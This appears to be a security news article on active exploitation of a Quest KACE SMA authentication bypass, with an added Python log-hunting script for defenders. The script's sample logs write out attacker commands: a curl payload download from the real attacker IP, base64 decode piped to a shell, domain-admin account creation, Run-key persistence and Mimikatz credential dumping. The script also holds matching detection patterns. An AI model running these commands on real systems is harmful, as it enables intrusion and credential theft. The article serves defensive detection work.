Cybersecurity researchers have identified active exploitation of a critical security flaw affecting Quest KACE Systems Management Appliance (SMA), raising serious concerns for organizations relying on the platform.
According to Arctic Wolf, suspicious activity tied to this vulnerability began during the week of March 9, 2026. The attacks target SMA appliances that are both unpatched and directly reachable from the internet. The attackers' ultimate objectives are not yet clear, but the access obtained is administrative, so the potential impact is high.
Authentication Bypass Enables Full System Control
The vulnerability, tracked as CVE-2025-32975 (CVSS score 10.0), is an authentication bypass: it lets an unauthenticated attacker impersonate a legitimate user of the appliance without supplying valid credentials.
An attacker who exploits it can take over administrative accounts and, with them, the appliance itself. Quest released a patch in May 2025, but appliances that have not been updated remain fully exposed.
Attack Method and Payload Deployment
Threat actors are believed to be leveraging this flaw to execute remote commands on compromised systems. Investigations indicate that attackers are using curl commands to download Base64-encoded payloads from an external server identified as 216.126.225[.]156.
Base64-encoding the payload keeps recognisable strings out of the download and out of the command line, which helps the activity slip past simple keyword-based inspection; the decode-and-execute step and the connection to that IP address are, however, themselves detectable.
Persistence and Privilege Expansion Techniques
Following initial access to the appliance, the attackers use its own agent to reach the Windows endpoints it manages, maintaining control and widening their reach:
- Creation of new administrative accounts via a background process linked to the SMA Agent
- Execution of scripts through runkbot.exe, a process that ships with the SMA Agent
- Modification of Windows Registry settings via PowerShell scripts, likely to ensure persistence or alter system configurations
Advanced Post-Exploitation Activities
Further analysis reveals that attackers are performing multiple post-exploitation operations to strengthen their foothold:
- Credential extraction using widely known tools such as Mimikatz
- System reconnaissance by identifying active users and administrative groups
- Execution of network commands like “net time” and “net group” for environment mapping
- Gaining Remote Desktop Protocol (RDP) access to critical infrastructure, including backup systems and domain controllers
These activities indicate a structured and potentially long-term attack strategy.
Mitigation and Security Recommendations
Security experts strongly advise organizations to take immediate action to reduce risk exposure:
- Update all SMA systems to the latest patched versions
- Avoid exposing management appliances directly to the internet
- Monitor for unusual administrative activity and unauthorized account creation, on the appliance and on the endpoints it manages; because exploitation is already under way, an unpatched internet-facing appliance should be checked for the indicators above, not just patched
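The following Python is an added illustration, not code from the Arctic Wolf report or from Quest, of what hunting for the persistence and post-exploitation behaviours listed above, and the monitoring the recommendations call for, can look like. It runs a small rule set over constructed log lines covering the appliance and two managed Windows hosts. The only indicator taken from the report is the payload server IP; the key=value log format, host names, the `svc_kace` account, file paths and everything else in the sample are assumptions made for the example.

```python
import re

IOC_IP = "216.126.225.156"  # payload server named in the Arctic Wolf findings

# Constructed sample telemetry (not real logs): one SMA appliance and two managed
# Windows endpoints, in a simple key=value format. Hosts, account and paths are made up.
SAMPLE_LOGS = r"""
2026-03-10T02:11:52Z host=kace-sma01 event=ProcessCreate user=www image=curl cmdline="curl -s http://216.126.225.156/p.txt -o /tmp/p.b64"
2026-03-10T02:11:53Z host=kace-sma01 event=ProcessCreate user=www image=sh cmdline="sh -c 'base64 -d /tmp/p.b64 | sh'"
2026-03-10T02:14:07Z host=WS-042 event=ProcessCreate user=SYSTEM parent=runkbot.exe image=powershell.exe cmdline="powershell.exe -nop -w hidden -File C:\ProgramData\Quest\KACE\kbots_cache\s.ps1"
2026-03-10T02:14:09Z host=WS-042 event=ProcessCreate user=SYSTEM parent=powershell.exe image=net.exe cmdline="net user svc_kace Pa55word! /add /domain"
2026-03-10T02:14:10Z host=WS-042 event=ProcessCreate user=SYSTEM parent=powershell.exe image=net.exe cmdline="net group 'Domain Admins' svc_kace /add /domain"
2026-03-10T02:14:11Z host=WS-042 event=ProcessCreate user=SYSTEM parent=powershell.exe image=reg.exe cmdline="reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d C:\ProgramData\svc.exe"
2026-03-10T02:20:31Z host=WS-042 event=ProcessCreate user=svc_kace parent=cmd.exe image=net.exe cmdline="net group 'Domain Admins' /domain"
2026-03-10T02:20:33Z host=WS-042 event=ProcessCreate user=svc_kace parent=cmd.exe image=net.exe cmdline="net time /domain"
2026-03-10T02:25:02Z host=WS-042 event=ProcessCreate user=svc_kace parent=cmd.exe image=m.exe cmdline="m.exe privilege::debug sekurlsa::logonpasswords exit"
2026-03-10T02:40:15Z host=DC01 event=Logon user=svc_kace logontype=10 src=10.20.30.42
2026-03-10T08:00:00Z host=WS-017 event=ProcessCreate user=SYSTEM parent=runkbot.exe image=powershell.exe cmdline="powershell.exe -File C:\ProgramData\Quest\KACE\kbots_cache\inventory.ps1"
2026-03-10T08:05:00Z host=WS-017 event=ProcessCreate user=jdoe parent=explorer.exe image=curl.exe cmdline="curl https://updates.example.com/x.txt"
"""

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_event(line):
    """Turn one key=value log line into a dict; quoted values may contain spaces."""
    ts, _, rest = line.partition(" ")
    ev = {"ts": ts, "cmdline": ""}
    for key, quoted, bare in FIELD_RE.findall(rest):
        ev[key] = quoted or bare
    return ev

def _cmd(pattern):
    """Build a rule that matches a case-insensitive regex against the command line."""
    rx = re.compile(pattern, re.I)
    return lambda ev: bool(rx.search(ev.get("cmdline", "")))

PS_STEALTH = re.compile(r"-(w|windowstyle)\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-(e|enc|encodedcommand)\s", re.I)

RULES = [
    ("payload_download_from_ioc", _cmd(re.escape(IOC_IP))),
    ("base64_decode_piped_to_shell", _cmd(r"base64\s+(-d|--decode)\b.*\|\s*(sh|bash)\b|FromBase64String")),
    ("account_created_via_net", _cmd(r"\bnet(1)?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b")),
    ("admin_group_membership_added", _cmd(r"\bnet(1)?(\.exe)?\s+(localgroup\s+administrators|group\s+\W?domain admins\W?)\s+\S+\s+/add\b")),
    ("run_key_persistence", _cmd(r"(reg(\.exe)?\s+add|New-ItemProperty|Set-ItemProperty).*CurrentVersion\\Run\b")),
    ("domain_recon_net_commands", _cmd(r"\bnet(1)?(\.exe)?\s+(group|time)\b(?!.*/add)")),
    ("credential_dumping", _cmd(r"sekurlsa::|lsadump::|privilege::debug|mimikatz")),
    # runkbot.exe legitimately runs scripts pushed by the appliance, so only a
    # PowerShell child that hides its window, skips the profile or runs encoded
    # commands is flagged; plain agent scripts (see WS-017) stay quiet.
    ("agent_pushed_stealth_powershell",
     lambda ev: ev.get("parent", "").lower() == "runkbot.exe"
                and "powershell" in ev.get("image", "").lower()
                and bool(PS_STEALTH.search(ev.get("cmdline", "")))),
]

ACCOUNT_RE = re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\b", re.I)

def hunt(log_text):
    """Apply every rule to every line and correlate RDP logons with accounts the attacker created."""
    findings, created_accounts = [], set()
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        for name, matches in RULES:
            if matches(ev):
                findings.append({"ts": ev["ts"], "host": ev.get("host", "?"), "rule": name,
                                 "evidence": ev["cmdline"] or ev.get("event")})
        m = ACCOUNT_RE.search(ev["cmdline"])
        if m:
            created_accounts.add(m.group(1).lower())
        # Logon type 10 is RemoteInteractive (RDP); a freshly created account reaching
        # a domain controller over RDP is the end state the report describes.
        if ev.get("event") == "Logon" and ev.get("logontype") == "10" \
                and ev.get("user", "").lower() in created_accounts:
            findings.append({"ts": ev["ts"], "host": ev.get("host", "?"),
                             "rule": "rdp_logon_by_newly_created_account",
                             "evidence": f"{ev['user']} from {ev.get('src')}"})
    return findings

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOGS):
        print(f"{f['ts']} {f['host']:<11} {f['rule']:<34} {f['evidence']}")
```

The stateless rules each fire on a single event; the RDP rule is the one correlation, keyed on the account name captured from the `net user ... /add` line. On a real estate the weak point is the runkbot.exe rule: the appliance distributes legitimate scripts through the same process, so a baseline of what it actually pushes is a better filter than the PowerShell flags used here.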
Quest resolved the vulnerability in the following SMA releases:
- 13.0.385
- 13.1.81
- 13.2.183
- 14.0.341 (Patch 5)
- 14.1.101 (Patch 4)
Organizations that delay patching remain at significant risk of compromise.